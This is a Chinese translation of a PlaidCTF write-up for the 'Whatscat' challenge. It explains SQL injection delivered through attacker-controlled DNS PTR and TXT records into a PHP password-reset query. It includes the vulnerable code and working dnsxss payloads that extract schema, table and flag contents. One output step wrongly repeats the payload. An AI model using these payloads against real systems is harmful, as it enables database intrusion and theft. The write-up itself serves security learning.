作者:
BMa
·
2015/01/15 12:35
原文:https://blog.skullsecurity.org/2014/plaidctf-writeup-for-web-300-whatscat-sql-injection-via-dns
建議先看:/papers/?id=3133
0x00 分析
Whatscat是一個可以上傳貓咪的照片並且可以評論的php應用,地址:
https://blogdata.skullsecurity.org/whatscat.tar.bz2
漏洞程式碼存在於login.php的密碼重置模組,如下:
#!php
elseif (isset($_POST["reset"])) {
$q = mysql_query(sprintf("select username,email,id from users where username='%s'",
mysql_real_escape_string($_POST["name"])));
$res = mysql_fetch_object($q);
$pwnew = "cat".bin2hex(openssl_random_pseudo_bytes(8));
if ($res) {
echo sprintf("<p>Don't worry %s, we're emailing you a new password at %s</p>",
$res->username,$res->email);
echo sprintf("<p>If you are not %s, we'll tell them something fishy is going on!</p>",
$res->username);
$message = <<<CAT
Hello. Either you or someone pretending to be you attempted to reset your password.
Anyway, we set your new password to $pwnew
If it wasn't you who changed your password, we have logged their IP information as follows:
CAT;
$details = gethostbyaddr($_SERVER['REMOTE_ADDR']).
print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true);
mail($res->email,"whatscat password reset",$message.$details,"From: [email protected]\r\n");
mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'",
$pwnew,$details,$res->username));
}
else {
echo "Hmm we don't seem to have anyone signed up by that name";
}
注意如下程式碼:
#!php
$details = gethostbyaddr($_SERVER['REMOTE_ADDR']).
print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true);
mail($res->email,"whatscat password reset",$message.$details,"From: [email protected]\r\n");
mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'",
$pwnew,$details,$res->username));
$details變數未編碼即插入資料庫中。我注意到過去人們過於相信DNS查詢返回的結果,這是這種誤區的最好事例!如果我們能夠在DNS請求中插入SQL語句,就萬事大吉了!
在完成Whatscat挑戰過程中,我點選forgot password,輸入使用者名稱:admin,然後它傳送給我的一個Mailinator,一個郵件伺服器。我登入這個郵箱,注意到有些人嘗試透過TXT記錄進行SQL隱碼攻擊,這些可能是其他使用者留下的記錄。
這個TXT記錄實際上是用於便捷地控制所有SkullSpace ip地址的PTR記錄,它能夠做一些有用的事情而不是用來破壞!我用這個伺服器做blog和一些在SkullSpace網路上的東西,然後我透過它設定了test.skullseclabs.org的PTR記錄。實際上,如果你對206.220.196.59進行DNS解析,你會看見如下內容:
#!bash
$ host blog.skullsecurity.org
blog.skullsecurity.org is an alias for skullsecurity.org.
skullsecurity.org has address 206.220.196.59
$ host 206.220.196.59
59.196.220.206.in-addr.arpa domain name pointer test.skullseclabs.org.
我為test.skullseclabs.org控制了授權伺服器,所以我可以偽造任意記錄。雖然對於這個級別來說是殺雞用牛刀,但是至少我不用每次為了改變一條記錄而翻到註冊頁面,並且我可以使用我寫的一個叫做dnsxss的工具快速做到:
https://github.com/iagox86/nbtool
#!bash
$ sudo ./dnsxss --payload="Hello yes this is test"
Listening for requests on 0.0.0.0:53
Will response to queries with: Hello/yes/this/is/test
$ dig -t txt test123.skullseclabs.org
[...]
;; ANSWER SECTION:
test123.skullseclabs.org. 1 IN TXT "Hello yes this is test.test123.skullseclabs.org"
現在要做的就是找到合適的payload!
0x01 The exploit
我並不是盲注的fans,所以我在本地伺服器搭了一個版本,開啟SQL錯誤。然後我開始開發一個exploit!這是一條update語句,所以不能直接注入。我只能間接地透過將資料庫內容返回在email上來讀取。我也不知道如何適當地終止SQL語句(既不用#,也不用--,以及;),最終我的payload將能夠:
UPDATE其他的值到email欄位上
恰當地讀到最後,意味著用”resetinfo=”結束查詢,所以”resetinfo=”欄位會被餘下部分填充。
最終payload如下:
./dnsxss --payload="test', email='test1234', resetinfo='"
我建立了一個賬戶,從我的ip重置密碼,重新整理。在測試伺服器上完整的語句如下:
update users set password='catf7a252e008616c94', resetinfo='test.skullseclabs.orgArray ( [0] => Array ( [host] => test.skullseclabs.org [class] => IN [ttl] => 1 [type] => TXT [txt] => test', email='test1234', resetinfo='.test.skullseclabs.org [entries] => Array ( [0] => test', email='test1234', resetinfo=' ) ) ) ' where username='ron'
執行之後,重置密碼內容如下:
Don't worry ron, we're emailing you a new password at test1234
If you are not ron, we'll tell them something fishy is going on!
已經成功重置了密碼!
但是我想要的不是這個!
Mysql有一個非常便利的資料庫叫做information_schema,可以透過它匯出所有內容,修改payload如下:
./dnsxss --payload="test', email=(select group_concat(SCHEMA_NAME separator ', ') from information_schema.SCHEMATA), resetinfo='"
找回密碼,重新整理一下,收到如下郵件:
Don't worry ron, we're emailing you a new password at information_schema, mysql, performance_schema, whatscat
If you are not ron, we'll tell them something fishy is going on!
得到whatscat的所有表名:
./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"
收到郵件:
./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"
得到flag表的所有列名:
./dnsxss --payload="test', email=(select group_concat(COLUMN_NAME separator ', ') from information_schema.COLUMNS where TABLE_NAME='flag'), resetinfo='"
收到郵件:
Don't worry ron, we're emailing you a new password at flag
If you are not ron, we'll tell them something fishy is going on!
最後取出列中的內容:
./dnsxss --payload="test', email=(select group_concat(flag separator ', ') from whatscat.flag), resetinfo='"
得到flag:
Don't worry ron, we're emailing you a new password at 20billion_d0llar_1d3a
If you are not ron, we'll tell them something fishy is going on!
0x02 總結
這篇paper的重點是透過偽造了PTR的記錄型別,將DNS查詢的TXT記錄定向到自己控制的dns伺服器,從而控制了DNS插敘返回的內容,而人們往往是無條件信任DNS查詢返回的內容。
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!